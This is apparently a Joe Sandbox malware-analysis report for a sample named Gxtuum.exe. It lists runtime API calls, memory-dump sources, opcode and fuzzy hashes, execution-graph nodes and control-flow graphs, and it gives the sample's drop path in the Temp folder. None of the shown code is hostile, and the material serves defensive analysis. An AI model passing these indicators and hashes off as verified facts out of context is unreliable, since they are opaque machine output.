                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                                • String ID:
                                                                • API String ID: 420990631-0
                                                                • Opcode ID: f40790e9c1958ac6bd048e86cb0bc7c6c82f50e9c4829344d1d69e1da59344b6
                                                                • Instruction ID: c2bb85020cefce62641b22f8cebe3d81004edb007d4a1bb1f73f5a8b5f47f36e
                                                                • Opcode Fuzzy Hash: f40790e9c1958ac6bd048e86cb0bc7c6c82f50e9c4829344d1d69e1da59344b6
                                                                • Instruction Fuzzy Hash: B911E976508600ABCA117B65EC12B5F7BA8FB51B20F00481AF9C5E76E3DFB5D840C6A0
                                                                APIs
                                                                • GetLastError.KERNEL32(00100FD7,00100FD7,8B18EC83,00111657,00118818,?,?,0010A1C2,00100FD7,?,001037BE,8B18EC84,74DF0F00), ref: 0011731C
                                                                • _free.LIBCMT ref: 00117379
                                                                • _free.LIBCMT ref: 001173AF
                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010A1C2,00100FD7,?,001037BE,8B18EC84,74DF0F00), ref: 001173BA
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: f416d3958c0e8afd1bc4bfc69e55b401734d70257f3bab19035b752fb743fd13
                                                                • Instruction ID: 650df2c772ed50ac7aa94581746e03e90f8293cb4080893dc4d474f4b90a7816
                                                                • Opcode Fuzzy Hash: f416d3958c0e8afd1bc4bfc69e55b401734d70257f3bab19035b752fb743fd13
                                                                • Instruction Fuzzy Hash: B41186362186017BDB5D26B9AC81EEB256AABE27747250334F935D32F1DF61CCC16121
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00125D87,?,?,?,00000020,00000001), ref: 0011A2A5
                                                                • GetLastError.KERNEL32(?,00125D87,?,?,?,00000020,00000001), ref: 0011A2AF
                                                                • __dosmaperr.LIBCMT ref: 0011A2B6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: 9f02b3e05bc38e6e49dd532b641757e0b972d205230da9db40fe52fe9f050a85
                                                                • Instruction ID: ac81fe219bc3305816dd828c466c8ad27c13f306ee26b6485776db3299325709
                                                                • Opcode Fuzzy Hash: 9f02b3e05bc38e6e49dd532b641757e0b972d205230da9db40fe52fe9f050a85
                                                                • Instruction Fuzzy Hash: D1F06D32201115BBCB282BA6DC089CAFF69FF457A03458120F619D7420DB32E8D0D7D1
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00125D12,?,?,?,?,00000020,00000001), ref: 0011A30E
                                                                • GetLastError.KERNEL32(?,00125D12,?,?,?,?,00000020,00000001), ref: 0011A318
                                                                • __dosmaperr.LIBCMT ref: 0011A31F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: f497c28a40161774f497d7e9fc5e1d04501e199878cfc252af500870b248c376
                                                                • Instruction ID: 35c6b7208746c8cf27528781a3b49847b3170406726f086c83d59a812099841b
                                                                • Opcode Fuzzy Hash: f497c28a40161774f497d7e9fc5e1d04501e199878cfc252af500870b248c376
                                                                • Instruction Fuzzy Hash: 87F01D32601115BBCB295FA6DC08ADAFF69FF447A03598531F629D7420DB31E890DBD1
                                                                APIs
                                                                • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000), ref: 00127901
                                                                • GetLastError.KERNEL32(?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?,00000000,?,00118482,8B18EC83), ref: 0012790D
                                                                  • Part of subcall function 001278D3: CloseHandle.KERNEL32(FFFFFFFE,0012791D,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?,00000000), ref: 001278E3
                                                                • ___initconout.LIBCMT ref: 0012791D
                                                                  • Part of subcall function 00127895: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001278C4,001243BF,00000000,?,00117F36,?,?,00000000,?), ref: 001278A8
                                                                • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?), ref: 00127932
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                • String ID:
                                                                • API String ID: 2744216297-0
                                                                • Opcode ID: f0ff351726600f56bf03f9c48e12c9df535d54eabd3648a5c6ad2d8e2aff0c3b
                                                                • Instruction ID: a5fab39a772c374668663e7a4972fa37f32441ab9ad3699f56f8c97b5a8a5db8
                                                                • Opcode Fuzzy Hash: f0ff351726600f56bf03f9c48e12c9df535d54eabd3648a5c6ad2d8e2aff0c3b
                                                                • Instruction Fuzzy Hash: 39F0AC3A504165BBCF221F95EC08A9B3F66EB1A3A5B144014FE1DD5570D73298A0DB91
                                                                APIs
                                                                • SleepConditionVariableCS.KERNEL32(?,00109EF7,00000064,?,000E8A41,0014CDC0), ref: 00109F7D
                                                                • LeaveCriticalSection.KERNEL32(00148FA8,0014CDC0,?,00109EF7,00000064,?,000E8A41,0014CDC0), ref: 00109F87
                                                                • WaitForSingleObjectEx.KERNEL32(0014CDC0,00000000,?,00109EF7,00000064,?,000E8A41,0014CDC0), ref: 00109F98
                                                                • EnterCriticalSection.KERNEL32(00148FA8,?,00109EF7,00000064,?,000E8A41,0014CDC0), ref: 00109F9F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                • String ID:
                                                                • API String ID: 3269011525-0
                                                                • Opcode ID: 5eeb76bb1aaf168e6b25980f01496b07792166d1f5ffa4e0deb9d10beeb40fff
                                                                • Instruction ID: 7fc890cc1a2e8175487242a3c7a38a916c6e1a7ccb1699aa892ba709e2b7949e
                                                                • Opcode Fuzzy Hash: 5eeb76bb1aaf168e6b25980f01496b07792166d1f5ffa4e0deb9d10beeb40fff
                                                                • Instruction Fuzzy Hash: 2AE04F36A45125BBCB012F50EC09ACEBF2AFF59B72B104111FA09A69B0CFB119959BD4
                                                                APIs
                                                                • _free.LIBCMT ref: 00114B02
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 00114B15
                                                                • _free.LIBCMT ref: 00114B26
                                                                • _free.LIBCMT ref: 00114B37
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 2d4fd8c805d5b0f39cbd8bbee5fe3c61806142e86c0ef76162163cb0957bedf2
                                                                • Instruction ID: 73a21dbac150b872c4e8a393ee24ea20b7118106b4e4c68bc573bdbb81c4db73
                                                                • Opcode Fuzzy Hash: 2d4fd8c805d5b0f39cbd8bbee5fe3c61806142e86c0ef76162163cb0957bedf2
                                                                • Instruction Fuzzy Hash: 8DE0E6BD8112209ECB556F15FC418C7BE62F79A754342801EF41C22A31DB3945D29F95
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 001138ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: 72830601d4d190bcd7499e48e000b5b7b398fe225b2d9e754e905b4aa40778ce
                                                                • Instruction ID: fa417983987e14404107ffa1355b92535a7fd53028fb9cf4e7c0fa69bab56c22
                                                                • Opcode Fuzzy Hash: 72830601d4d190bcd7499e48e000b5b7b398fe225b2d9e754e905b4aa40778ce
                                                                • Instruction Fuzzy Hash: A751CD61A0820596CB1D7794C9113FE6BE5EB60B58F208E79F8E1422ACFF348DD4DB42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                • API String ID: 0-1719652438
                                                                • Opcode ID: 4e7ab262a72269248bb2bc06d2742f7b514ffa54077f01a489952fb6bdc3edc6
                                                                • Instruction ID: 2cee17ab87825b8060a7fe6356f4d1e9660e4418fdfc30c2bac0dfd742a692ca
                                                                • Opcode Fuzzy Hash: 4e7ab262a72269248bb2bc06d2742f7b514ffa54077f01a489952fb6bdc3edc6
                                                                • Instruction Fuzzy Hash: 5E41A071E00215AFDB299F9ADC819DFBBB8EF99710B11007AF508D7251E7718AC1CB51
                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0010D4E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 2118026453-2084237596
                                                                • Opcode ID: 4b28fcaf82ee544a3e9bf7ed0bf9cfe9389f840d056e9eb56c40efaf918eedcc
                                                                • Instruction ID: 1886c81d0d480946ecc023a2ab4ac0665e698a96b821414bee634b58825ecf7b
                                                                • Opcode Fuzzy Hash: 4b28fcaf82ee544a3e9bf7ed0bf9cfe9389f840d056e9eb56c40efaf918eedcc
                                                                • Instruction Fuzzy Hash: 3A419C71900209AFCF16DF98DC81AEEBBB5FF08304F188059F945A7291D3B59A51CF51
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 000E44EB
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000E453A
                                                                  • Part of subcall function 00108D3E: _Yarn.LIBCPMT ref: 00108D5D
                                                                  • Part of subcall function 00108D3E: _Yarn.LIBCPMT ref: 00108D81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                • String ID: bad locale name
                                                                • API String ID: 1908188788-1405518554
                                                                • Opcode ID: 38357056dc3681d9bd6c1fdb624cf9cf8aa67c13d7dfbac2ddbb59af6fd5f1d6
                                                                • Instruction ID: 08ed8cd8c2d6ee9475fad4bb9ff19b353030f07b0f6207117633d18b076d5d9c
                                                                • Opcode Fuzzy Hash: 38357056dc3681d9bd6c1fdb624cf9cf8aa67c13d7dfbac2ddbb59af6fd5f1d6
                                                                • Instruction Fuzzy Hash: 0411A071904B849FD320CF69C901747BBE8EF29710F008A1EE499D7B81E7B5A504CB95

                                                                Execution Graph

                                                                Execution Coverage:0.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:106
                                                                Total number of Limit Nodes:3
                                                                execution_graph 24453 117317 GetLastError 24454 117334 24453->24454 24455 11732e 24453->24455 24472 11733a SetLastError 24454->24472 24476 118d8c 24454->24476 24488 118d4d 6 API calls __dosmaperr 24455->24488 24462 117381 24465 118d8c __dosmaperr 6 API calls 24462->24465 24463 11736a 24464 118d8c __dosmaperr 6 API calls 24463->24464 24473 117378 24464->24473 24466 11738d 24465->24466 24467 117391 24466->24467 24468 1173a2 24466->24468 24470 118d8c __dosmaperr 6 API calls 24467->24470 24490 116fee 14 API calls __dosmaperr 24468->24490 24470->24473 24489 1185a6 14 API calls __dosmaperr 24473->24489 24474 1173ad 24491 1185a6 14 API calls __dosmaperr 24474->24491 24492 118b3c 24476->24492 24479 117352 24479->24472 24481 11ab80 24479->24481 24480 118dc6 TlsSetValue 24487 11ab8d __dosmaperr 24481->24487 24482 11abcd 24507 111652 14 API calls __dosmaperr 24482->24507 24483 11abb8 RtlAllocateHeap 24485 117362 24483->24485 24483->24487 24485->24462 24485->24463 24487->24482 24487->24483 24506 113d81 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 24487->24506 24488->24454 24489->24472 24490->24474 24491->24472 24493 118b6a 24492->24493 24496 118b66 24492->24496 24493->24496 24499 118a75 24493->24499 24496->24479 24496->24480 24497 118b84 GetProcAddress 24497->24496 24498 118b94 __dosmaperr 24497->24498 24498->24496 24504 118a86 ___vcrt_FlsFree 24499->24504 24500 118b31 24500->24496 24500->24497 24501 118aa4 LoadLibraryExW 24502 118abf GetLastError 24501->24502 24501->24504 24502->24504 24503 118b1a FreeLibrary 24503->24504 24504->24500 24504->24501 24504->24503 24505 118af2 LoadLibraryExW 24504->24505 24505->24504 24506->24487 24507->24485 24508 10a528 24509 10a534 CallCatchBlock 24508->24509 24534 10a24e 24509->24534 24511 10a53b 24512 10a694 24511->24512 24522 10a565 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 24511->24522 24560 10a895 4 API calls 2 library calls 24512->24560 24514 10a69b 24556 10e34e 24514->24556 24518 10a6a9 24519 10a584 24520 10a605 24542 11470b 24520->24542 24522->24519 24522->24520 24559 10e328 37 API calls 4 library calls 24522->24559 24524 10a60b 24546 1011a0 24524->24546 24535 10a257 24534->24535 24562 10aa7f IsProcessorFeaturePresent 24535->24562 24537 10a263 24563 10cb69 10 API calls 2 library calls 24537->24563 24539 10a268 24540 10a26c 24539->24540 24564 10cb88 7 API calls 2 library calls 24539->24564 24540->24511 24543 114714 24542->24543 24544 114719 24542->24544 24565 114266 49 API calls 24543->24565 24544->24524 24547 1011ab 24546->24547 24566 f1600 113 API calls 24547->24566 24567 10e1ec 24556->24567 24559->24520 24560->24514 24561 10e312 23 API calls _unexpected 24561->24518 24562->24537 24563->24539 24564->24540 24565->24544 24568 10e1fa 24567->24568 24569 10e20c 24567->24569 24595 10a9b5 GetModuleHandleW 24568->24595 24579 10e093 24569->24579 24573 10e1ff 24573->24569 24596 10e292 GetModuleHandleExW 24573->24596 24574 10a6a1 24574->24561 24578 10e24f 24580 10e09f CallCatchBlock 24579->24580 24602 112ae0 EnterCriticalSection 24580->24602 24582 10e0a9 24603 10e0ff 24582->24603 24584 10e0b6 24607 10e0d4 24584->24607 24587 10e250 24612 1166e2 GetPEB 24587->24612 24590 10e27f 24593 10e292 _unexpected 3 API calls 24590->24593 24591 10e25f GetPEB 24591->24590 24592 10e26f GetCurrentProcess TerminateProcess 24591->24592 24592->24590 24594 10e287 ExitProcess 24593->24594 24595->24573 24597 10e2b1 GetProcAddress 24596->24597 24598 10e2d4 24596->24598 24601 10e2c6 24597->24601 24599 10e20b 24598->24599 24600 10e2da FreeLibrary 24598->24600 24599->24569 24600->24599 24601->24598 24602->24582 24604 10e10b CallCatchBlock 24603->24604 24605 10e16c _unexpected 24604->24605 24610 1149f3 14 API calls _unexpected 24604->24610 24605->24584 24611 112b28 LeaveCriticalSection 24607->24611 24609 10e0c2 24609->24574 24609->24587 24610->24605 24611->24609 24613 1166fc 24612->24613 24615 10e25a 24612->24615 24616 118bbf 24613->24616 24615->24590 24615->24591 24617 118b3c __dosmaperr 5 API calls 24616->24617 24618 118bdb 24617->24618 24618->24615

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,0010E24F,?,?,?,?,?,0010F4C2), ref: 0010E272
                                                                • TerminateProcess.KERNEL32(00000000,?,0010E24F,?,?,?,?,?,0010F4C2), ref: 0010E279
                                                                • ExitProcess.KERNEL32 ref: 0010E28B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 6b17f8363c27f1fe96dedabc28d7fda2d55ecde51168805203d53f6cb9e8c05c
                                                                • Instruction ID: 77a1d3520e7e33c377c4f5f19e12c5ec79420782ca2bc9ad09cf3f728f245022
                                                                • Opcode Fuzzy Hash: 6b17f8363c27f1fe96dedabc28d7fda2d55ecde51168805203d53f6cb9e8c05c
                                                                • Instruction Fuzzy Hash: ACE0B631140208BFCF116B69DD099493FADFB60781B208814F845D6571CB75DD91CA40

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 118a75-118a81 1 118b28-118b2b 0->1 2 118b31 1->2 3 118a86-118a97 1->3 6 118b33-118b37 2->6 4 118aa4-118abd LoadLibraryExW 3->4 5 118a99-118a9c 3->5 9 118b0f-118b18 4->9 10 118abf-118ac8 GetLastError 4->10 7 118aa2 5->7 8 118b25 5->8 11 118b21-118b23 7->11 8->1 9->11 12 118b1a-118b1b FreeLibrary 9->12 13 118aca-118adc call 1166a8 10->13 14 118aff 10->14 11->8 16 118b38-118b3a 11->16 12->11 13->14 20 118ade-118af0 call 1166a8 13->20 15 118b01-118b03 14->15 15->9 18 118b05-118b0d 15->18 16->6 18->8 20->14 23 118af2-118afd LoadLibraryExW 20->23 23->15
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 0-537541572
                                                                • Opcode ID: 9db6299b8b20cf52443d471fd211fa46cf76ad2ed775ba2337e3202ac3291e25
                                                                • Instruction ID: a82b5adcd954ad7f0e3dcdc57576528fec47ee88254e5a4d3444e57df6cc0b8c
                                                                • Opcode Fuzzy Hash: 9db6299b8b20cf52443d471fd211fa46cf76ad2ed775ba2337e3202ac3291e25
                                                                • Instruction Fuzzy Hash: F021E7B1A09211ABDB298B34AC85A9F37699F05760F254131FC16A72D1DF30EC80C6E4

                                                                Control-flow Graph

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,00111657,000E2397), ref: 0011731C
                                                                • _free.LIBCMT ref: 00117379
                                                                • _free.LIBCMT ref: 001173AF
                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00111657,000E2397), ref: 001173BA
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: f416d3958c0e8afd1bc4bfc69e55b401734d70257f3bab19035b752fb743fd13
                                                                • Instruction ID: 650df2c772ed50ac7aa94581746e03e90f8293cb4080893dc4d474f4b90a7816
                                                                • Opcode Fuzzy Hash: f416d3958c0e8afd1bc4bfc69e55b401734d70257f3bab19035b752fb743fd13
                                                                • Instruction Fuzzy Hash: B41186362186017BDB5D26B9AC81EEB256AABE27747250334F935D32F1DF61CCC16121

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 65 118b3c-118b64 66 118b66-118b68 65->66 67 118b6a-118b6c 65->67 68 118bbb-118bbe 66->68 69 118b72-118b79 call 118a75 67->69 70 118b6e-118b70 67->70 72 118b7e-118b82 69->72 70->68 73 118ba1-118bb8 72->73 74 118b84-118b92 GetProcAddress 72->74 75 118bba 73->75 74->73 76 118b94-118b9f call 10e0e0 74->76 75->68 76->75
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94b552a1b33a676a7feaaeae512d17e141dc0ee8320f1806c9d1231bfb8d4e0d
                                                                • Instruction ID: f5dbb0c36a39b34ebf8691ed2016b4c133a4d0104b1b695e400139785fafc8ce
                                                                • Opcode Fuzzy Hash: 94b552a1b33a676a7feaaeae512d17e141dc0ee8320f1806c9d1231bfb8d4e0d
                                                                • Instruction Fuzzy Hash: 9A01F1B7708611AFDF2E8F2AEC8199A37D6ABC6764325C130F901DB1A4DF30D8818684

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
